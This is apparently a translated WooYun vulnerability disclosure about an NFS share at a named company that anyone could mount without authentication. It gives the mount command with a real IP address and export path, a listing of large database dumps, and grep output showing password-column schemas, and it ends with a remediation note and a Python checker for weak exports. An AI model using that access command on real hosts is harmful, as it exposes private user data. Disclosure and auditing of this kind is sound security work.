
Unauthorized access to a service at Guang puts 25G of database data at risk of being obtained (test only)

2015-01-17 20:25

NFS unauthorized access: the export can be mounted by any host without authentication.

mount -t nfs 115.236.20.3:/home/huangm ssd

Code:
[root@localhost ~]# ping dev.guang.com
PING dev.guang.com (115.236.20.3) 56(84) bytes of data.
64 bytes from 115.236.20.3: icmp_seq=1 ttl=48 time=52.2 ms
Code:
[root@localhost ssd]# ls -lh
total 29G
-rw-r--r-- 1 nobody nobody 795 Jan 6 03:09 aphrodite_2015-01-06.sql
-rw-r--r-- 1 nobody nobody 792 Jan 6 03:09 apollo_2015-01-06.sql
-rw-r--r-- 1 nobody nobody 792 Jan 6 03:09 athena_2015-01-06.sql
drwxr-xr-x 9 nobody nobody 4.0K Jan 8 09:29 cpc-backend
drwxr-xr-x 8 nobody nobody 4.0K Jan 8 09:36 cpc-consumer
-rw-r--r-- 1 nobody nobody 87M Jan 6 03:09 crm_2015-01-06.sql
-rw-r--r-- 1 nobody nobody 25G Jan 6 03:09 guang_2015-01-06.sql
-rw-r--r-- 1 nobody nobody 4.6G Jan 6 15:19 guang_2015-01-06.tar.gz
drwxrwxrwx 12 nobody nobody 4.0K Dec 31 10:18 guang-monitor
drwxrwxrwx 12 nobody nobody 4.0K Dec 29 21:57 guang-scheduler
-rw------- 1 nobody nobody 0 Jan 6 15:40 nohup.out

I don't know what the data contains; I didn't look, didn't dare to. The crm dump is probably important data too.

Proof of vulnerability:

A quick check confirms there is user data inside

Code:
[root@localhost ssd]# grep 'password' crm_2015-01-06.sql -B 10 -A 10
-- Table structure for table `seller`
--

DROP TABLE IF EXISTS `seller`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `seller` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(10) DEFAULT NULL,
  `email` varchar(45) DEFAULT NULL,
  `password` varchar(32) DEFAULT NULL,
  `role` tinyint(4) DEFAULT NULL COMMENT '角色:0-管理员,1-普通销售人员',
  `unsign_client_num` smallint(11) DEFAULT NULL COMMENT '未签约商家数',
  `create_time` datetime DEFAULT NULL,
  `modify_time` datetime DEFAULT NULL,
  `last_login_time` datetime DEFAULT NULL COMMENT '最后登陆时间',
  `admin_id` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `email` (`email`)
) ENGINE=InnoDB AUTO_INCREMENT=60 DEFAULT CHARSET=utf8 COMMENT='销售人员';
/*!40101 SET character_set_client = @saved_cs_client */;

The 25G database

Code:
[root@localhost ssd]# head -n 1001 guang_2015-01-06.sql|grep 'password' -B 10 -A 10

--
-- Table structure for table `cpc_cellphone_login`
--

DROP TABLE IF EXISTS `cpc_cellphone_login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cpc_cellphone_login` (
  `cellphone` varchar(11) NOT NULL,
  `password` varchar(50) DEFAULT NULL COMMENT '登录密码',
  `create_time` datetime DEFAULT NULL,
  PRIMARY KEY (`cellphone`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='cpc手机登陆';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cpc_cellphone_login`
--

LOCK TABLES `cpc_cellphone_login` WRITE;
--

--
-- Table structure for table `cpc_cellphone_login_bak20141106`
--

DROP TABLE IF EXISTS `cpc_cellphone_login_bak20141106`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cpc_cellphone_login_bak20141106` (
  `cellphone` varchar(11) NOT NULL,
  `password` varchar(50) DEFAULT NULL COMMENT '登录密码',
  `create_time` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cpc_cellphone_login_bak20141106`
--

LOCK TABLES `cpc_cellphone_login_bak20141106` WRITE;
/*!40000 ALTER TABLE `cpc_cellphone_login_bak20141106` DISABLE KEYS */;

Fix:

Access control: restrict the NFS export to the specific hosts that need it instead of exporting it to everyone, keep root_squash enabled, and do not expose the NFS ports to the public network.
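As an added example (not part of the original report), the following checker parses exports(5)-style lines and flags the settings that make an export like the one above reachable by any host. The exports content is constructed for the demo; the export path /home/huangm is taken from the report, the other paths and the 10.0.0.5 backup host are made up.

```python
import re
from dataclasses import dataclass

# Constructed /etc/exports content: the first line mirrors the kind of export
# that lets any host mount the share; the last line is the hardened version.
SAMPLE_EXPORTS = """\
# weak: exported to every host, writable, root not squashed
/home/huangm *(rw,no_root_squash,sync)
# classic typo: the space before "(rw,sync)" exports to everyone with rw
/srv/backup 10.0.0.5 (rw,sync)
# hardened: one backup host only, read-only, root squashed
/srv/backup 10.0.0.5(ro,sync,root_squash)
"""

@dataclass
class Finding:
    path: str
    client: str
    reason: str

def parse_exports(text):
    """Yield (path, client, options) triples from exports(5)-style text."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        if not clients:
            yield path, "*", []  # a path with no client list is open to all
            continue
        for token in clients:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", token)
            if m is None:
                continue  # malformed token, not something exportfs accepts
            client, opts = m.group(1), m.group(2)
            options = opts.split(",") if opts else []
            # exports(5): a bare "(opts)" token means "every host" with opts
            yield path, client or "*", options

def audit_exports(text):
    """Return Findings for exports open to any host or with root_squash off."""
    findings = []
    for path, client, options in parse_exports(text):
        open_to_all = client == "*"
        if open_to_all:
            findings.append(Finding(path, client, "exported to any host"))
        if "no_root_squash" in options:
            findings.append(Finding(path, client, "root_squash disabled"))
        if open_to_all and "rw" in options:
            findings.append(Finding(path, client, "writable by any host"))
    return findings
```

Run it against the real file with `audit_exports(open("/etc/exports").read())`; a clean result means every export names explicit clients and keeps root_squash.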


Source: www.wooyun.org/bugs/wooyun-2015-091468
